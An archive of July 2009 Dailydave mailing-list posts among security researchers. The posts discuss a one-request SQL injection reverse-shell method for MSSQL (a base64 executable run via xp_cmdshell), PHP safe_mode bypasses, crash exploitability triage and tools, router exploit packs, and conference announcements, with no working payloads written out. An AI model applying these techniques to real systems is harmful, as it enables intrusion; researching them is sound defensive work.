From ferruh at mavituna.com Fri Jul 3 06:49:51 2009
From: ferruh at mavituna.com (Ferruh Mavituna)
Date: Fri, 3 Jul 2009 11:49:51 +0100
Subject: [Dailydave] One Click Ownage [White Paper and Scripts]
Message-ID: <6dc88c3c0907030349i310c006duf525a326ba6f614@mail.gmail.com>

This is a different and more practical approach to get a reverse shell or code execution in SQL Injections (*particularly in MSSQL*). The idea is simple. Getting a reverse shell from an SQL Injection with one HTTP request without using an extra channel such as TFTP, FTP to upload the initial payload.

White paper explains the steps and the details of the attack. Scripts got all the tools you need to create your HTTP request with your own payload.

*White Paper:* http://ferruh.mavituna.com/papers/oneclickownage.pdf
*Scripts:* http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
*Presentation (IT Underground 2009):* http://www.slideshare.net/fmavituna/one-click-ownage-1660539

Regards,

--
http://ferruh.mavituna.com

From dave at kof.immunityinc.com Fri Jul 3 07:06:06 2009
From: dave at kof.immunityinc.com (Dave Aitel)
Date: Fri, 3 Jul 2009 07:06:06 -0400
Subject: [Dailydave] Citrix, PHP, SyScan,
Message-ID: <4e1ef3e50907030406s6221dce1mc749856dc88201f3@mail.gmail.com>

The sign of a good hacker is often that they make it look really stinkin' easy. Like today at SyScan 09 (Singapore) Brett Moore went from "remote anonymous" to "domain admin" in about 5 clicks using various Citrixy things (live demos are fun!). As he says "You can explain this stuff all day, but when network admins actually see you do it, that's when they learn".

Likewise, Stefan Esser pointed out that he had released a bugclass in PHP (that helps you bypass Safe Mode) back in his "month of PHP bugs".
But when he goes through the thousand circumstantial steps of how you exploit it reliably (his exploit worked smoothly against PHP x86 and x64 in his demo) it makes a lot more sense.

The basic theory of his work (as I understand it) is this: The PHP engine's code does not take proper account of the idea that types of PHP variables can be changed during a function's execution. So for example, you use the "explode" function but while it's exploding you change a variable in the hashtable and (via some magic) you can then get a nice information leak. A similar bug results in creation of a string with size of 2 gigs and starting memory address of 0. This means you can do things like my_fake_string[0x41414141]=0; to write to that address in memory. Via some parsing (work goes here) you can turn off safe_mode, fix the removed functions, and get out of PHP jails in all senses of the term.

The other side benefit is that when you are running PHP in a common setup, with SSL and mod_php, you can then read the process's memory to recover the SSL private key. This is one time when MS's use of LSASS for storing private keys and doing all the crypto makes sense!

Anyways, more on the talks later - next up is SyScan Taiwan!

-dave

From dave at kof.immunityinc.com Fri Jul 3 23:09:47 2009
From: dave at kof.immunityinc.com (Dave Aitel)
Date: Fri, 3 Jul 2009 23:09:47 -0400
Subject: [Dailydave] One Click Ownage [White Paper and Scripts]
In-Reply-To: <6dc88c3c0907030349i310c006duf525a326ba6f614@mail.gmail.com>
References: <6dc88c3c0907030349i310c006duf525a326ba6f614@mail.gmail.com>
Message-ID: <4e1ef3e50907032009j364d7f72nfd5b8a049e1ed6fd@mail.gmail.com>

To sum up the paper: You base64 a callback executable into a VBS script and then send it over to be executed by xp.cmdshell.
What would be more useful, since DB servers are rarely routable to the internet, is something that injects into SQL Server and then can be talked to with MOSDEF or some other ping-pong protocol via the initial SQL Injection so you can get real access to the DB layer. This wouldn't be that hard really.

-dave

On Fri, Jul 3, 2009 at 6:49 AM, Ferruh Mavituna wrote:

> This is a different and more practical approach to get a reverse shell or code execution in SQL Injections (*particularly in MSSQL*). The idea is simple. Getting a reverse shell from an SQL Injection with one HTTP request without using an extra channel such as TFTP, FTP to upload the initial payload.
>
> White paper explains the steps and the details of the attack. Scripts got all the tools you need to create your HTTP request with your own payload.
>
> *White Paper:* http://ferruh.mavituna.com/papers/oneclickownage.pdf
> *Scripts:* http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
> *Presentation (IT Underground 2009):* http://www.slideshare.net/fmavituna/one-click-ownage-1660539
>
> Regards,
>
> --
> http://ferruh.mavituna.com
From ferruh at mavituna.com Sat Jul 4 04:59:04 2009
From: ferruh at mavituna.com (Ferruh Mavituna)
Date: Sat, 4 Jul 2009 09:59:04 +0100
Subject: [Dailydave] One Click Ownage [White Paper and Scripts]
In-Reply-To: <4e1ef3e50907032009j364d7f72nfd5b8a049e1ed6fd@mail.gmail.com>
References: <6dc88c3c0907030349i310c006duf525a326ba6f614@mail.gmail.com> <4e1ef3e50907032009j364d7f72nfd5b8a049e1ed6fd@mail.gmail.com>
Message-ID: <6dc88c3c0907040159w5d7b457we20e25f045e9cc1a@mail.gmail.com>

> To sum up the paper: You base64 a callback executable into a VBS script and then send it over to be executed by xp.cmdshell.

Yeah, the whole idea was making it easier, and making it easier allows you to carry out new attacks such as combining it with CSRF. Even better, you don't have to configure an application to carry out such an attack, you just need to copy paste a request. So it's a big optimization over any known way to do this.

> is something that injects into SQL Server and then can be talked to with MOSDEF or some other ping-pong protocol via the initial SQL Injection so you can get real access to the DB layer.

You can send any executable you want (*if it's too big you might need to separate the request*) so you might use DNS Tunnelling. Most of the database servers still can resolve DNS so it should be all right, otherwise you are stuck with less efficient ways to get an interactive shell.

2009/7/4 Dave Aitel

> To sum up the paper: You base64 a callback executable into a VBS script and then send it over to be executed by xp.cmdshell.
>
> What would be more useful, since DB servers are rarely routable to the internet, is something that injects into SQL Server and then can be talked to with MOSDEF or some other ping-pong protocol via the initial SQL Injection so you can get real access to the DB layer. This wouldn't be that hard really.
>
> -dave
>
> On Fri, Jul 3, 2009 at 6:49 AM, Ferruh Mavituna wrote:
>
>> This is a different and more practical approach to get a reverse shell or code execution in SQL Injections (*particularly in MSSQL*). The idea is simple. Getting a reverse shell from an SQL Injection with one HTTP request without using an extra channel such as TFTP, FTP to upload the initial payload.
>>
>> White paper explains the steps and the details of the attack. Scripts got all the tools you need to create your HTTP request with your own payload.
>>
>> *White Paper:* http://ferruh.mavituna.com/papers/oneclickownage.pdf
>> *Scripts:* http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
>> *Presentation (IT Underground 2009):* http://www.slideshare.net/fmavituna/one-click-ownage-1660539
>>
>> Regards,
>>
>> --
>> http://ferruh.mavituna.com

--
http://ferruh.mavituna.com

From dave at kof.immunityinc.com Sun Jul 5 11:20:37 2009
From: dave at kof.immunityinc.com (Dave Aitel)
Date: Sun, 5 Jul 2009 11:20:37 -0400
Subject: [Dailydave] Connections
Message-ID: <4e1ef3e50907050820s38fe0c5ag17388e2c8ef6f85e@mail.gmail.com>

You forget, if you are lucky enough to spend all your time in the same office with "Senior Security Researchers" (or traveling to conferences as some of us do) that many hackers at conferences have not met another hacker face to face in a long time.
Face to face is very high bandwidth communication - much higher than the encrypted IRC most of us are used to. But it's great being able to spend, say, two full days talking to Marc Schönefeld. His talk goes deeply over the process for creating undx, but creating the process that can with a high level of certainty reverse the binaries so you can analyze them for security issues is probably more central to his talk, and to his current "study" as a researcher. I.E. The following kinds of problems (virtual functions, optimizations) are what you're likely to find in a bytecode language. Here's how you develop the process to write code to reverse them. Now how do you optimize that process?

Of course, Marc also likes to slip in various extremely geeky jokes into his conversation, almost as a test. Lots of the hackers do this - it's the initial handshake to the almost homogenous hacker language of unrestricted blasphemy.

Tomorrow I'm doing shellcode training with the web app again. You can teach almost anyone how to write buffer overflows, but a lifelong dedication to irreverence is harder, and without that. . .

-dave

From dave at kof.immunityinc.com Tue Jul 7 23:35:15 2009
From: dave at kof.immunityinc.com (Dave Aitel)
Date: Tue, 7 Jul 2009 23:35:15 -0400
Subject: [Dailydave] Upstream
Message-ID: <4e1ef3e50907072035w3c74aa4an90e01911e4c1917a@mail.gmail.com>

So exploits are hard. Not just "these days" but always hard. It's gritty low level work. Lots of people consider it "grunt work" and think they're above it or beyond it - even unconsciously. But deep down a working exploit and not a paper or presentation is still the undisputed mark of success.

In a way, this is why the process works best when in teams.
If people see that it's _customary_ to do the grunt work of reversing another allocation algorithm, and spending a month figuring out how to take advantage of it, then they'll do it.

I'm packing to head back to the states, but here's my final thoughts on SyScan Taipei:

1. Lots more women here than at any technical conference I've been to recently. I'm not sure why. SyScan Taipei is a large conference - at least 250 people, probably more. There's a big community here, although it's hard to interact if you don't speak Chinese.

2. "Birdman", one of the speakers talked for a while about a malware classification and defense system he's been working on. It does a number of things. The talk was in Chinese, but I think I grasped most of it:

   1. It goes into every process and calculates a list of the DLL's inside it, and uses inference to try to figure out which ones are explicitly requested to be there. If a DLL is in the process but not loaded explicitly, it puts it into a gray list.
   2. Everything in the gray list is analyzed for behavior somehow and run through some simple heuristics. These generate some numbers.
   3. The numbers are used for classification - anything similar to a known malware is classified as malware. In this sense it generates "families" of malware. It's similar to VxClass from Zynamics, but without using structural information (to my knowledge).

   Birdman's system has some flaws (I.e. would not catch MOSDEF, etc.) but everything does and it's not high cost in terms of resources.

3. If you get the chance, head up to the volcano and drink while looking down at the city. It's expensive, but awesome.

-dave
From dave at kof.immunityinc.com Tue Jul 7 23:53:03 2009
From: dave at kof.immunityinc.com (Dave Aitel)
Date: Tue, 7 Jul 2009 23:53:03 -0400
Subject: [Dailydave] The inability to deliver a secure implementation is an architectural flaw.
Message-ID: <4e1ef3e50907072053v40d8e8cep5e85de4a24553fe1@mail.gmail.com>

Congrats to Mark Dowd and Ben Hawkes on winning the Google Native Client contest. But the google blog gives you pause: http://googlecode.blogspot.com/2009/07/native-client-security-contest-results.html

So in the CLOUDBURST talk we quote a DOD private unclassified journal as a lessons learned:

"The Next Wave"
Vol 17 No 3 - 2008

"Using seven analysts over a ten week period and with some limited input from VMware developers, we explored the ability of the core NetTop technologies - VMware running on a Linux host - to maintain isolation [...]. The results of this first study were encouraging - no apparent show-stopping flaws were identified."

NetTop is a virtualization based system that establishes a "virtual air gap" between two VM's running at different classification level. When systems like that have failures, the result is strategic. It's not patchable. The article is interesting and talks about how while the technical review staff were against the idea, they got pushed over and the system was deployed "successfully"!

I thought it was interesting the same verbiage came from the Google Blog today re: Native Client.

"""
This contest helped us discover implementation errors in Native Client and some areas of our codebase we need to spend more time reviewing. More importantly, that no major architectural flaws were found provides evidence that Native Client can be made safe enough for widespread use.
"""

At some point someone senior at any project like this needs to quantify the level of testing that is required to build a secure product.
Contests are interesting, but they're not providing evidence of architectural safety. All we learned here was that with some minor level of effort, lots of bugs can be found. That's not a good sign. Although it's impossible to prove "there's no bugs", it IS possible to decide not to do stuff you can't reasonably do. That's how you avoid getting on the "advisory treadmill".

-dave

From halvar at gmx.de Wed Jul 8 02:24:25 2009
From: halvar at gmx.de (Halvar Flake)
Date: 8 Jul 2009 08:24:25 +0200
Subject: [Dailydave] The inability to deliver a secure implementation is an architectural flaw.
In-Reply-To: <4e1ef3e50907072053v40d8e8cep5e85de4a24553fe1@mail.gmail.com>
References: <4e1ef3e50907072053v40d8e8cep5e85de4a24553fe1@mail.gmail.com>
Message-ID: <4A543B99.2000905@gmx.de>

Hey all,

First of all congrats to Mark & Ben.

I do find the quote from the "seven analysts over ten weeks" amusing. Clearly, nobody would ever invest more than that much work in obtaining classified information.

The real beauty in NaCl is that it is certain to defeat DEP for the attacker. Not that DEP is much of an obstacle in browsers these days, but still. It'll also almost certainly allow ASLR bypass.

Everyone who has even been to one of my classes has been tortured with the analogy that "writing an exploit is like trying to build a chair out of a number of random parts from the IKEA warehouse: Nothing ever fits, but the more pieces you have, the better your odds of success are".

The power to first execute Javascript to perform allocations/deallocations, coupled with the ability to load arbitrary code into the address space that is only verified under alignment assumptions violated as soon as you can perform a control hijack, does look like a jar of superglue to me.
And when you have a sufficiently large jar of superglue, you can essentially build a chair out of wood shavings.

Cheers,
Halvar

Dave Aitel wrote:

> Congrats to Mark Dowd and Ben Hawkes on winning the Google Native Client contest. But the google blog gives you pause: http://googlecode.blogspot.com/2009/07/native-client-security-contest-results.html
>
> So in the CLOUDBURST talk we quote a DOD private unclassified journal as a lessons learned:
>
> "The Next Wave"
> Vol 17 No 3 - 2008
>
> "Using seven analysts over a ten week period and with some limited input from VMware developers, we explored the ability of the core NetTop technologies - VMware running on a Linux host - to maintain isolation [...]. The results of this first study were encouraging - no apparent show-stopping flaws were identified."
>
> NetTop is a virtualization based system that establishes a "virtual air gap" between two VM's running at different classification level. When systems like that have failures, the result is strategic. It's not patchable. The article is interesting and talks about how while the technical review staff were against the idea, they got pushed over and the system was deployed "successfully"!
>
> I thought it was interesting the same verbiage came from the Google Blog today re: Native Client.
>
> """
> This contest helped us discover implementation errors in Native Client and some areas of our codebase we need to spend more time reviewing. More importantly, that no major architectural flaws were found provides evidence that Native Client can be made safe enough for widespread use.
> """
>
> At some point someone senior at any project like this needs to quantify the level of testing that is required to build a secure product. Contests are interesting, but they're not providing evidence of architectural safety. All we learned here was that with some minor level of effort, lots of bugs can be found. That's not a good sign.
> Although it's impossible to prove "there's no bugs", it IS possible to decide not to do stuff you can't reasonably do. That's how you avoid getting on the "advisory treadmill".
>
> -dave

From kalvin.dai at gmail.com Tue Jul 7 23:42:21 2009
From: kalvin.dai at gmail.com (Kalvin Dai)
Date: Tue, 7 Jul 2009 23:42:21 -0400
Subject: [Dailydave] Call for Papers - the 2nd IEEE International Symposium on Ubisafe Computing (UbiSafe-09)
Message-ID: <718372d40907072042w3700991ct468ba0cf6ed59ed8@mail.gmail.com>

Dear Professor or Colleague:

We apologize if you have received duplicate Call for Papers. You are invited to submit papers for the 2nd IEEE International Symposium on Ubisafe Computing (UbiSafe-09).

The 2nd IEEE International Symposium on Ubisafe Computing (UbiSafe-09), Sponsored by IEEE CS TCSC, will be held in Chengdu, China, December 12-14, 2009. More information can be found in http://cs.okstate.edu/ubisafe09/ .

In conjunction with the 8th IEEE International Conference on Dependable, Autonomic and Secure Computing (DASC09) and the 8th IEEE International Conference on Pervasive Intelligence and Computing (PICom09)

IMPORTANT DEADLINES:

Submission Deadline: Aug. 15, 2009
Author Notification: Sep. 30, 2009
Final Manuscript Due: Oct. 15, 2009

SYMPOSIUM INFORMATION:

Computers are now available anytime, anywhere, by different means, and distributed unobtrusively throughout the everyday environments in which physical objects/artifacts embedded with invisible computers are sensible and networked locally and globally.
Such "any" computers open tremendous opportunities to provide numerous novel services/applications in both real world and cyber spaces, and exist ubiquitously in our daily life, working, learning, traveling, entertainment, medicine, etc. Although it is yet unclear what exactly the real-cyber integrated worlds would be, there is no doubt that they must be safe.

UbiSafe emphasizes the SAFE aspects for ubiquitous, pervasive, AmI, mobile, universal, embedded, wearable, augmented, invisible, hidden, context-aware, sentient, proactive, autonomic, or whatever it is called, computing. UbiSafe computing is focused on theories and technologies for ubiquitous artifacts to function safely for different purposes; for ubiquitous systems to work safely in various situations; and for ubiquitous environments to behave safely with all people. A series of challenges exist to let people benefit from ubiquitous services, and simultaneously guarantee their safety in making ubiquitous safe artifacts, systems, and environments.

Following the great success of UbiSafe-07 held at Niagara Falls, Canada, 2007, the UbiSafe-09 Symposium provides a forum for engineers and scientists in academia, industry, and government to address all safety related profound challenges including technical, social, legal and ethical issues, and to present and discuss their ideas, theories, technologies, systems, tools, applications, work in progress and experience on all aspects of UbiSafe computing.

Topics of particular interest include, but are not limited to:

* Fundamentals - UbiSafe concepts, definitions, basic elements, models, frameworks and methodologies, human-centric paradigms, multi-disciplinary/inter-disciplinary/trans-disciplinary approaches, semantics, ontologies, UbiSafe requirements and formal specifications and validations, information assurance, etc.
* Technologies - Security and privacy protection, reliability and fault tolerance, risk analysis, uncertainty and exception handling, socially intelligent agents, intuitive/natural user interface, interaction design, context-awareness, intelligent computing, service-oriented computing, hardware, software, middleware, etc.
* Systems - Embedded systems, wearable systems, augmented systems, context-based systems, communication systems, safety-critical systems, survivable systems, persistent systems, autonomous/autonomic systems, proactive systems, network infrastructure, sensor networks, etc.
* Applications - Smart objects, smart environments, information appliance and artifacts, everyday gadgets, robots, safety care, healthcare, medical care and services, working, learning, traveling, entertainment, case studies, etc.
* Measures and Assessments - UbiSafe attributes and measures for safety, trust, faith, amenity, easiness, comfort, satisfaction and worryness, UbiSafe levels and relations, UbiSafe quality, assessment criteria and authority, subjective and objective assessment standards, evaluation methodologies, testing, measuring and monitoring tools, etc.
* Human Factors and Social Issues - Human and social aspects of UbiSafe, UbiSafe sources and factors, social rules, regulations and laws, human factors, human behavior analysis, modeling of human feelings, traditional and cultural issues, ethical issues, etc.

SUBMISSION INFORMATION:

Submit full papers not exceeding 8 pages in PDF format (IEEE Computer Society Proceedings Manuscripts style: two columns, single-spaced), including figures and references, using 10 fonts, and number each page. You can download the IEEE CS Proceedings Author Guidelines from the following web site ftp://pubftp.computer.org/press/outgoing/proceedings/. UbiSafe-09 submission web site is at http://cse.stfx.ca/~ubisafe09/sub .
PAPER PUBLICATION:

Authors of accepted papers will receive guidelines on preparing and submitting the final manuscript(s) together with the notification of acceptance. The proceedings will be published by IEEE Computer Society Press. Authors of accepted papers, or at least one of them, are required to register and present their work at the conference, otherwise their papers will be removed from the digital library after the conference. Distinguished papers, after further revisions, will be published in one of the following journals: Security and Communication Networks (SCN), Journal of Autonomic and Trusted Computing (JoATC), and the Journal of Ubiquitous Computing and Intelligence (JUCI).

GENERAL INFORMATION:

GENERAL CHAIRS
Xiaolin (Andy) Li, Oklahoma State University, USA
Guojun Wang, Central South University, China
Vijay Varadharajan, Macquarie University, Australia

PROGRAM CHAIRS
Ping Yang, SUNY Binghamton, USA
Zhiwen Yu, Northwestern Polytech Univ., China
Fabrizio Baiardi, University of Pisa, Italy

STEERING COMMITTEE
Vipin Chaudhary, University at Buffalo, SUNY, USA
Jingde Cheng, Saitama University, Japan
Thomas Grill, Johannes Kepler Univ. Linz, Austria
Runhe Huang, Hosei University, Japan
Ismail Khalil, Johannes Kepler Univ. Linz, Austria
Qun Jin, Waseda University, Japan
Xiaolin (Andy) Li, Oklahoma State University, USA
Jianhua Ma, Hosei University, Japan
Laurence T. Yang, St. Francis Xavier University, Canada
Qiangfu Zhao, The University of Aizu, Japan

PUBLICITY CHAIRS
Xiaole Bai, Ohio State University, USA
Emmanuelle Anceaume, IRISA, France

PROGRAM COMMITTEE MEMBERS:
See UbiSafe-09 web site: http://cs.okstate.edu/ubisafe09/

For further information please email to: ubisafe09 at googlegroups.com
From dave at kof.immunityinc.com Wed Jul 8 06:13:38 2009
From: dave at kof.immunityinc.com (Dave Aitel)
Date: Wed, 8 Jul 2009 06:13:38 -0400
Subject: [Dailydave] More from Taiwan
Message-ID: <4e1ef3e50907080313g1ec26eebl48f2c2784b0be3c3@mail.gmail.com>

Ok, so here's the thing Ben Nagy and I were going on about at lunch. I thought I'd share it with thousands of people.

Ben's problem is that he has 200,000[2] crashes in the latest Word. Word 2007 or whatever. He classifies these problems with !exploitable from Microsoft, which drops them into buckets of various sorts. But saying "This is probably exploitable"[1] or not is a really hard problem - far beyond what !exploitable is useful for. (It claims to do data tainting, but this is clearly a misnomer?). Basically it divides things into "Definitely likely to be exploitable because EIP is 41414141", "Pretty much likely to be exploitable cause we're writing to bad memory" and "Everything else".

So here's my little idea (which I'm sure everyone else has had at least twice cause I'm not a special snowflake): Take each basic block and number it. Execute the program twice, once with your crashing file, and once with your template. This generates two signals, which have a stream of numbers in them (from the execution trace). Then you can do interesting things by converting to frequency domain (I.E. FFT?) and doing filtering and visualization. Ben thinks you want to attach state to your numbers too (i.e. memory and register info?). I'm not so keen on that because I think too much data can be as bad as too little, but whatever. Each to their own.

I'm not sure what the interesting thing here is that magically tells you something is worth really digging into? Maybe you take your two signals, and subtract their frequencies and visualize how different they are? Throw that at a HMM/NN and make it tell you something?
-dave

[1] Ben: Do you have a !exploitable in Immunity Debugger? Me: Yes, it just returns true. :>
[2] Literally.

From bania.piotr at gmail.com Wed Jul 8 08:45:04 2009
From: bania.piotr at gmail.com (Piotr Bania)
Date: Wed, 8 Jul 2009 14:45:04 +0200
Subject: [Dailydave] More from Taiwan
References: <4e1ef3e50907080313g1ec26eebl48f2c2784b0be3c3@mail.gmail.com>
Message-ID:

Yo,

I think dynamic data flow analysis (including register/memory tracking (taint analysis) etc.) is something that can provide you a lot of answers in this case. Basically you can analyze how the input data (let's say a fuzzed .doc* file) influences the execution flow of a program (in this case Microsoft Word). Whenever an exception happens you can test if the faulting instruction used operand(s) that was/were previously tainted (came from the input in a direct or indirect way). And that's why I have created SpiderPig [1].

One of the problems here is speed. I have no idea how you are going to create the execution trace, but if you are thinking about using single stepping via your debugger API I really wish you luck and a lot of patience :). In my SpiderPig project I have used the Virtual Code Integration technique (as explained in the article), however I am exchanging it right now for my own dynamic binary instrumentation engine (not because of speed), which should be ready when it will be ready :-)

I also advise you to look at other projects that are using dynamic taint analysis. Btw. Julio Auto should speak about some data flow coolness at SOURCE Barcelona 2009[2], perhaps his talk can give you some hints too.
best regards,
pb

[1] - http://piotrbania.com/all/spiderpig/
[2] - http://www.sourceconference.com/index.php/source-barcelona-2009/schedule

----- Original Message -----
From: "Dave Aitel"
To:
Sent: Wednesday, July 08, 2009 12:13 PM
Subject: [Dailydave] More from Taiwan

> Ok, so here's the thing Ben Nagy and I were going on about at lunch. I thought I'd share it with thousands of people.
>
> Ben's problem is that he has 200,000[2] crashes in the latest Word. Word 2007 or whatever. He classifies these problems with !exploitable from Microsoft, which drops them into buckets of various sorts. But saying "This is probably exploitable"[1] or not is a really hard problem - far beyond what !exploitable is useful for. (It claims to do data tainting, but this is clearly a misnomer?). Basically it divides things into "Definitely likely to be exploitable because EIP is 41414141", "Pretty much likely to be exploitable cause we're writing to bad memory" and "Everything else".
>
> So here's my little idea (which I'm sure everyone else has had at least twice cause I'm not a special snowflake): Take each basic block and number it. Execute the program twice, once with your crashing file, and once with your template. This generates two signals, which have a stream of numbers in them (from the execution trace). Then you can do interesting things by converting to frequency domain (I.E. FFT?) and doing filtering and visualization. Ben thinks you want to attach state to your numbers too (i.e. memory and register info?). I'm not so keen on that because I think too much data can be as bad as too little, but whatever. Each to their own.
>
> I'm not sure what the interesting thing here is that magically tells you something is worth really digging into? Maybe you take your two signals, and subtract their frequencies and visualize how different they are? Throw that at a HMM/NN and make it tell you something?
>
> -dave
>
> [1] Ben: Do you have a !exploitable in Immunity Debugger? Me: Yes, it just returns true. :>
> [2] Literally.

From alex at sotirov.net Wed Jul 8 22:41:26 2009
From: alex at sotirov.net (Alexander Sotirov)
Date: Wed, 8 Jul 2009 22:41:26 -0400
Subject: [Dailydave] Pwnie Awards 2009
Message-ID: <20090709024126.GA20511@MacBook.local>

The Pwnie Awards ceremony will return for the third consecutive year to the BlackHat USA conference in Las Vegas. The award ceremony will take place during the BlackHat reception on Wed, July 29.

The Pwnie Awards is an annual awards ceremony celebrating the achievements and failures of security researchers and the wider security community in the past year. We're currently accepting nominations in nine award categories:

* Best Server-Side Bug
* Best Client-Side Bug
* Mass 0wnage
* Most Innovative Research
* Lamest Vendor Response
* Most Overhyped Bug
* Best Song
* Most Epic FAIL (new for 2008)
* Lifetime Achievement award for hackers over 30 (new for 2008)

The deadline for nominations is Wed, July 15. To submit a nomination, visit the Pwnie Awards site at http://pwnie-awards.org/

For more last minute information, follow @PwnieAwards on Twitter, http://twitter.com/PwnieAwards

For questions, please email info at pwnie-awards.org

Alexander Sotirov
Dino Dai Zovi
Pwnie Awards 2009
Name: not available Type: application/pgp-signature Size: 194 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090708/6cd6d8e8/attachment.pgp From ayao at apple.com Wed Jul 8 16:10:03 2009 From: ayao at apple.com (Drew Yao) Date: Wed, 8 Jul 2009 13:10:03 -0700 Subject: [Dailydave] Announcing CrashWrangler Message-ID: <5A3761D1-EE6B-46FC-A7EF-124CA2C10AD5@apple.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, Apple recently released the new CrashWrangler tools to anyone with a free ADC account, and is available at: https://connect.apple.com/cgi-bin/WebObjects/MemberSite.woa/wa/getSoftware?bundleID=20390 ... or just look for it in the downloads section of http://connect.apple.com/ under Mac OS X. CrashWrangler is a set of developer tools that help in creating and debugging secure Mac OS X applications. The tools work by inspecting the application's state at the time of the crash, as well as the application crash logs. Using these tools on a reproducible test case can determine if a crash could lead to a potentially exploitable security issue, while providing valuable data to fix these issues. Additionally, any crash log can be inspected to determine if it is a duplicate of a known crash. The CrashWrangler tools support Mac OS X 10.5 or later. It should be understood that CrashWrangler uses advanced heuristics, but that false positives and false negatives are possible. It's intended for quick assessment. As always, a detailed manual inspection is the only way to be sure something is or isn't exploitable. The basic algorithm for determining exploitability looks like this. 
Exploitable if:
  Crash on write instruction
  Crash executing invalid address
  Crash calling an invalid address
  Crash accessing an uninitialized or freed pointer as indicated by using the MallocScribble environment variable
  Illegal instruction exception
  Abort due to -fstack-protector, _FORTIFY_SOURCE, heap corruption detected
  Stack trace of crashing thread contains certain functions such as malloc, free, szone_error, objc_MsgSend, etc.

Not exploitable if:
  Divide by zero exception
  Stack grows too large due to recursion
  Null dereference
  Other abort
  Crash on read instruction

If a crash is determined to be non-exploitable, it's recommended to run the test case again with libgmalloc(3) on with MALLOC_ALLOW_READS and MALLOC_FILL_SPACE set, and see if the crash changes to one that is considered to be exploitable.

CrashWrangler does not send any data about your crash to Apple or anyone else. Note that it does forward the information about the crash to CrashReporter, which is part of the OS, and as always it will send info to Apple if and only if you click the "Send to Apple" button in the Crash Reporter dialog.
Drew Yao Apple Product Security PGP key at https://www.apple.com/support/security/pgp/ From version5 at gmail.com Wed Jul 8 17:21:43 2009 From: version5 at gmail.com (nnp) Date: Wed, 8 Jul 2009 22:21:43 +0100 Subject: [Dailydave] More from Taiwan In-Reply-To: <4e1ef3e50907080313g1ec26eebl48f2c2784b0be3c3@mail.gmail.com> References: <4e1ef3e50907080313g1ec26eebl48f2c2784b0be3c3@mail.gmail.com> Message-ID: <28749c0e0907081421k3cf22b98nb841fba71f881356@mail.gmail.com> It's quite a difficult problem really, to give an answer that is correct a large percentage of the time without getting sucked into more heavyweight analysis i.e. dataflow and path conditions. One approach is to go the whole way and just try to generate an exploit, but this gets rather complicated quite quickly, and involves a lot of analysis that isn't going to be feasible to run for 200,000 test cases (I'm currently looking at ~1 hour for a single input on VLC) Especially with things like heap overflows, the determining factor on whether a bug is exploitable or not might not even be obvious from the path executed by the fuzz file. You may need to also analyse how much memory massaging you can do; an automated solution for which is probably going to need a pretty complicated dynamic/static analysis tool implementing something like [1], among other stuff.
(I do have a tendency to overcomplicate things though, so I'd love to hear more hackish solutions) Given the sheer number of crashes Ben has, there seems to be a real opportunity to see if there are parameters of an executed path that make the paths cluster into groups that are exploitable and not exploitable. One option is to use a NN optimising over some parameters of a path, although the requirement for training data might be prohibitive. There are similar clustering algorithms that don't have this exact drawback though. What I have in mind is something like the vector space model used to classify similarity between documents. A calculation is run on each path to give its position in the vector space and then clusters can be assigned manually, or via something like the k-means algorithm [2] The real trick/problem is in coming up with measurable properties of a single path that when this calculation is run, places it in/around the correct cluster. Basic blocks executed is one, perhaps assigning unique numbers to loops and using the number of times the loop is executed might be another... any other ideas? [1] http://bitblaze.cs.berkeley.edu/papers/EECS-2009-34.pdf [2] http://en.wikipedia.org/wiki/K-means_clustering On Wed, Jul 8, 2009 at 11:13 AM, Dave Aitel wrote: > Ok, so here's the thing Ben Nagy and I were going on about at lunch. I > thought I'd share it with thousands of people. > > Ben's problem is that he has 200,000[2] crashes in the latest Word. Word > 2007 or whatever. He classifies these problems with !exploitable from > Microsoft, which drops them into buckets of various sorts. But saying "This > is probably exploitable"[1] or not is a really hard problem - far beyond > what !exploitable is useful for. (It claims to do data tainting, but this is > clearly a misnomer?).
Basically it divides things into "Definitely likely to > be exploitable because EIP is 41414141", "Pretty much likely to be > exploitable cause we're writing to bad memory" and "Everything else". > > So here's my little idea (which I'm sure everyone else has had at least > twice cause I'm not a special snowflake): Take each basic block and number > it. Execute the program twice, once with your crashing file, and once with > your template. This generates two signals, which have a stream of numbers in > them (from the execution trace). Then you can do interesting things by > converting to frequency domain (I.E. FFT?) and doing filtering and > visualization. Ben thinks you want to attach state to your numbers too (i.e. > memory and register info?). I'm not so keen on that because I think too much > data can be as bad as too little, but whatever. Each to their own. > > I'm not sure what the interesting thing here is that magically tells you > something is worth really digging into? Maybe you take your two signals, and > subtract their frequencies and visualize how different they are? Throw that > at a HMM/NN and make it tell you something? > > -dave > > [1] Ben: Do you have a !exploitable in Immunity Debugger? Me: Yes, it just > returns true. :> > [2] Literally. > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From dave at immunityinc.com Tue Jul 14 09:32:20 2009 From: dave at immunityinc.com (dave) Date: Tue, 14 Jul 2009 09:32:20 -0400 Subject: [Dailydave] Staying on the treadmill. Message-ID: <4A5C88E4.90502@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 People (this means you) like to think hard about game changing events in the world of hacking. But just staying on the treadmill of exploit after exploit can be a game changing event. 
For example, today you may have noticed that Intevydis (http://www.intevydis.com/vulndisco.shtml) released as part of their latest exploit pack, some exploits for all the major access point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I mean "Here's a shell, now you get to install new programs and muck with the router's configuration" exploits. For a lot of people (not you) it's hard to care about such things. The inevitable ennui sets in: "oh, not another one", "that one is similar to one I found in 1992AD", "well, if you had good patch management that's the best you can do!", etc. etc. The magic is in finding each one of these things unique and special and worth of attention. -dave From joanna at invisiblethingslab.com Tue Jul 14 10:07:21 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Tue, 14 Jul 2009 16:07:21 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5C88E4.90502@immunityinc.com> References: <4A5C88E4.90502@immunityinc.com> Message-ID: <4A5C9119.50902@invisiblethingslab.com> dave wrote: > People (this means you) like to think hard about game changing events in > the world of hacking. But just staying on the treadmill of exploit after > exploit can be a game changing event. > > For example, today you may have noticed that Intevydis > (http://www.intevydis.com/vulndisco.shtml) released as part of their > latest exploit pack, some exploits for all the major access > point/mini-router firmwares. Not CSRF 